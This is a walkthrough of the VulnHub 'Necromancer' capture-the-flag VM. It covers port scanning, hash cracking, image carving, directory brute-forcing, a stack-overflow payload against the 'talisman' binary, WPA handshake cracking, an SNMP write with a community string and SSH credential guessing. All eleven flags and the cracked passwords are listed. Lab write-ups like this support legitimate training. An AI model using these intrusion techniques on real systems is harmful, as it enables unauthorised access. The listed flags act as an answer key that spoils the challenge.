Intro
Hi, I thought I would do a little writeup on the CTF VM "Necromancer" from VulnHub. The VM is a bit older, but is supposed to be quite exciting. I think it is also a little change to PicoCTF. The goal is to collect 11 flags.
Discovery and Scanning
After setting up the VM, I first searched for the VM with Netdiscover and found it.
First I run an Nmap scan and find that I am allowed to scan again because my laptop crashed. Fortunately, nothing exciting has happened yet. During the new scan, I'm surprised to find that Nmap doesn't show me any ports.
I thought I'd take a look at the traffic in Wireshark and noticed that the VM had tried to connect to my system on TCP port 4444.
So I thought to start a netcat listener and wait. And indeed I got a connection, but it was only one transmission.
Suspicious data
It looks like Base64, let's decode that. As output I get, a small story and the first flag. At the end I see u666
which means it is a UDP port.
Flag1 = flag1{e6078b9b1aac915d11b9fd59791030bf}
According to the story, I am supposed to enchant Flag 1, i.e. crack the hash in plain text. First we have to find out what kind of hash this is. It looks like an MD5 hash to me. Let's see what Hash-Identifer says about it. And yep it is a MD5 hash!
Port UDP 666
Next, let's connect to the UDP port 666 of the VM. It looks quite funny. I'm running out of air 😕
But what if I insert the cracked hash? Oh nice, I get more of the story and even my 2nd flag.
e6078b9b1aac915d11b9fd59791030bf = opensesame
Flag2 = flag2{c39cd4df8f2e35d20d92c2e44de5f7c6}
Port TCP 80
Next I'm supposed to go to Port 80, a little continuation of the adventure is waiting there.
Here it says I see many birds and very briefly the Necromancer. In addition a pretty picture, otherwise nothing, no further references. I just downloaded the complete page. When I wanted to look on which path the picture is, I got a 403
message and the info, that this would be an OpenBSD httpd. Well, I'll have a look at the downloaded files. In the source code there was nothing to see. After I had gone through everything except the image file, I took a closer look at the image file. With hexdump, I then found my answer.
Stego in Image?
There is probably a text file in the image. Let's see what Steghide, Zsteg or Foremost have to say about it. I have no luck with Steghide and ZSteg. Steghide wants a password and Zsteg doesn't recognize the image. But Foremost got all the content out for me. I now have a zip file with the text file.
There is a Base64 string in there. If I decode this, I get my 3rd flag, as well as another hint "Magic items".
Flag3 = flag3{9ad3f62db7b91c28b68137000394639f}
Again I searched all files with foremost, binwalk and hexdump etc... But here everything seems to be clean. I looked again at the source code of the page and decided to perform a directory bruteforce. After a bit of googling I found a Wikipedia entry where a list of magic or occult items are listed. I downloaded this with Cewl and converted it to a wordlist.
/opt/CeWL/cewl.rb -m4 -d0 -w wordlist-magic-items -v https://en.wikipedia.org/wiki/List_of_occult_terms
I ran the bruteforce with the wordlist and got an interesting result. A talisman 😄
The talisman is a file. In this case an ELF32 file, i.e. a binary.
Exploit the binary
Just run it! I am asked if I want to wear the talisman. Yes, of course I want to. But what is? Nothing happens.
No matter what I enter I always get "Nothing happens" back. But when I entered a too long text, I got a Segmentation Fault. That's something 😄
I debug the binary with GDB and am happy to see that I have overwritten the instruction pointer from 36 bytes. That is already good but where should I jump to?
Just have a look with objdump what functions and places are available. Here we have several functions:
08048a37 g F .text 00000aeb .hidden chantToBreakSpell
0804844b g F .text 00000052 .hidden unhide
080484f4 g F .text 00000035 .hidden myPrintf
0804849d g F .text 00000057 .hidden hide
08048529 g F .text 000004ea .hidden wearTalisman
I'll try the chantToBreakSpell function first.
./talisman <<< $(python -c "print 'A' * 32 + '\x37\x8a\x04\x08'")
I guess that was a bull's eye. I get another piece of the storyline and my 4th flag. At the end, I get the hint that I should take a closer look at the UDP port 31337.
Port UDP 31337
Flag4 = flag4{ea50536158db50247e110a6c89fcf3d3}
Arrived at port, and get Nothing happens. No output, nothing. I am supposed to enchant flag 4, which means hashcracking.
ea50536158db50247e110a6c89fcf3d3 = blackmagic
I connect to the port and look at what happens there. It happens similar as with the UDP port 666 where we had inserted the 2.flag. So blackmagic hit it and, I get another piece of the story and my 5th flag. Now I have to visit a new URL.
Flag5 = flag5{0766c36577af58e15545f099a3b15e60}
Back to port TCP 80
There I get directly the 6th flag. Here it is told that we will meet the Necromancer in the story.
Flag6 = flag6{b1c3ed8f1db4258e4dcb0ce565f6dc03}
On the path we are offered a file called "necromancer". Let's download this one, since everything else doesn't provide any more info. This is a BZ-2 archive. The archive contains a "necromancer.cap" file. After a longer look I see that a WPA/WPA2 handshake was done. So start Aircrack and crack the password.
After cracking the WPA/WPA2 password, the story tells me to connect to UDP port 161.
Port UDP 161
No sooner said than done, I connected to port 161 and found "Nothing happens". Nothing happens seems to be a running gag at the CTF.
After longer Googlen I may determine, which could run there also a correct service. After I noticed that this port is for the SNMP protocol, I had to read the manuals. After several attempts with smtpwalk, I got a bit further.
After hours of dealing with the horrible SNMP protocol and not really understanding what exactly does what there, I searched all the forums and asked for help on how to work with the SNMP protocol.
What I had to do was to replace the string "Locked - death2allrw" with "Unlocked".
snmpset -v 2c -c death2allrw 192.168.1.103 iso.3.6.1.2.1.1.6.0 s "Unlocked"
After fumbling, we finally move on and get our next clue and flag number 7.
Flag7 = flag7{9e5494108d10bbd5f9e7ae52239546c4}
Port TCP 22
When connecting to TCP port 22 as I suspected, I find that this is an SSH service. I once cracked the hash from the 7th flag and got as output, "demonslayer".
With this I tried to log in as root. But oh miracle did not work. My guess is that I can get further with an enumeration. I have created a small list of all the commands from this CTF. After a few minutes, I got the result that demonslayer is a user. So now I have to find out the password.
After a few seconds I run into the best password. I log in and am hit with an ASCII painting.
Here we find a text file called "flag8.txt". Here we have reached the point where we fight with the Necromancer. We are supposed to fend off his attack on the UDP port 777.
Port UDP 777
After I tried several times to connect to this port, but nothing came out, I thought about whether it might make more sense to access localhost. From that point on I sat for about 5-6 hours to understand what exactly I should do here.
Because here came things on, which exceed my mental horizon.
For those like me, which have now not really idea of the DnD and Magic stuff I have packed here the course to it.
Connection to localhost 777 port [udp/*] succeeded!
** You only have 3 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path?
** You only have 2 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path?
** You only have 1 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path?
** You only have 0 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path?
!!!!!!! You have been defeated by The Necromancer! (*_*) !!!!!!!
Connection to 192.168.43.170 closed by remote host.
Connection to 192.168.43.170 closed.
The upper comes out if you fail like me :D. Then you can discreetly start everything again from the beginning. From now on it time to google, and if necessary always start from the beginning. The best thing is to send everything that sounds like Magic or something as an answer.
efend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path? Kelewan
flag8{55a6af2ca3fee9f2fef81d20743bda2c}
Defend yourself from the Necromancer's Spells!
Who did Johann Faust VIII make a deal with? Mephistopheles
flag9{713587e17e796209d1df4c9c2c2d2966}
Defend yourself from the Necromancer's Spells!
Who is tricked into passing the Ninth Gate? Hedge
flag10{8dc6486d2c63cafcdc6efbba2be98ee4}
A great flash of light knocks you to the ground; momentarily blinding you!
As your sight begins to return, you can see a thick black cloud of smoke lingering where the Necromancer once stood.
An evil laugh echoes in the room and the black cloud begins to disappear into the cracks in the floor.
The room is silent.
You walk over to where the Necromancer once stood.
On the ground is a small vile.
From here fortunately nothing more comes where one may google around again.
From here I end up back at the normal shell of the VM. Now it says I should search for something that contains the word "vile".
Flag8 = flag8{55a6af2ca3fee9f2fef81d20743bda2c}
Flag9 = flag9{713587e17e796209d1df4c9c2c2d2966}
Flag10 = flag10{8dc6486d2c63cafcdc6efbba2be98ee4}
Rootflag
For this purpose there is the command locate, I applied it and come out in the home directory.
I read the file and in the last sentence I am told I now have power. Does that mean I have root rights from now on? No I do not!
I just tried to read the file flag11.txt in the root directory as I did with flag 8. Apparently I got the rights to do this.
This gives me my 11th flag.
Flag11 = flag11{42c35828545b926e79a36493938ab1b1}
With this, the CTF is through. I would like to say that this is quite an interesting VM. What upset me several times, however, was the part SNMP and where you had to fight against the Necromancer. Otherwise it was a quite funny CTF.
Small script for those who do not want to start all over again, if you lose at the Necromancer, have built a script that brings you directly to the Necromancer.
https://github.com/strider-paff-shell/Necromancer-Autorun
I hope the WriteUp went down well. Then until next time 😄